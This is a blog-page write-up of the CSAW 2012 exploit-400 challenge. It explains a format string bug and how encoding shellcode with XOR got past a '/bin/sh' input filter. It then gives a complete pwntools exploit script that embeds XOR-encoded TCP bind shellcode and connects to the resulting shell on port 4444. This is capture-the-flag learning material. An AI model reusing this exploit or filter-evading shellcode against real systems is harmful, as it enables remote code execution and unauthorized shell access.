<html>
 <head>
<title> Csaw 2012 exploit-400 </title>

 <link rel="stylesheet" type="text/css" href="test1.css" />
 <link rel="stylesheet" type="text/css" href="fonts.css" />
</head>
<style>

	.top {
	background: 
		linear-gradient(135deg, #ECEDDC 25%, transparent 25%) -50px 0,
		linear-gradient(225deg, #ECEDDC 25%, transparent 25%) -50px 0,
		linear-gradient(315deg, #ECEDDC 25%, transparent 25%),
		linear-gradient(45deg, #ECEDDC 25%, transparent 25%);	
		background-size: 100px 100px;
		background-color: #EC173A;
	width: 100%;
	height:40%; 
	}

      body {background-color:white;
	border-bottom:1px solid #bfbfbf
         line-height:1.5em;
	color:#222}
 
   p{color:black;
        /*font-style: italic;
       font-family: "Times New Roman";*/
      letter-spacing: 2px;
       font-size: 20px;
       margin-top: 10px;
       margin-bottom: 10px;
        margin-right: 150px;
       margin-left: 150px; 
       }



    h1{ color:black;
         font-style: italic;
        font-size:2.2em;
	font-family:"PT Serif","Georgia","Helvetica Neue",Arial,sans-serif;
	font-weight:normal;
	line-height:1.2em;
	margin-bottom:0.6667em
        margin-right: 150px;
       margin-left: 150px;}

code { 
display: block; white-space: pre-wrap; 
border: 1px solid #000; 
padding: 10px; 
line-height: 1.5em; 
font-family: "Lucida Console", Monaco, monospace; 
} 
.code-str 
{ color:#ff33d4; } 
 .code-comment { color:#3c33ff; } 
 .code-key { color:#9933ff; }
 .code-brown{color:#ba4a00} 


</style>
<body>

<script src="null.js"></script>

<div class = "top">
 <div style="position: absolute; bottom: 0; left: 0.5em; width: 400px; font-weight: bold; color: #fff;">
 <p style="color:white;font-size:2.2em;"> Blog </p>
 </div>
 </div>


 <br> <br>  <br>          

<h1 class="post-title"> Exploit 400 writeup </h1>
   
 <br> 

<p> This binary too had no protection .. it had a format string vulnerability so i just overflowed the buffer also the buffer was locate in bss section .. <br>
    only thing on our way to pwn the binary is it was filtering our input and checking if we have /bin/sh or something like it .. so the solution was too <br>
    use <b>XOR encoded Tcp_bind shellcode</b></p>

<code>
from pwn import *



shellcode="\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5\xd3\x9e"

print "[+] Len of payload=%d"%len(shellcode)


payload='\xeb'+chr(11)+"\x90"*2+"%524u"+pack(0x804b120)+shellcode


r=remote('127.0.0.1',23456)

msg=r.recvuntil(':')

print msg 

print "[+] Len of payload=%d"%len(payload)

r.send(payload+"\n")

r.close()

s=remote('127.0.0.1',4444)

s.interactive()

</code>


</body>
</html>
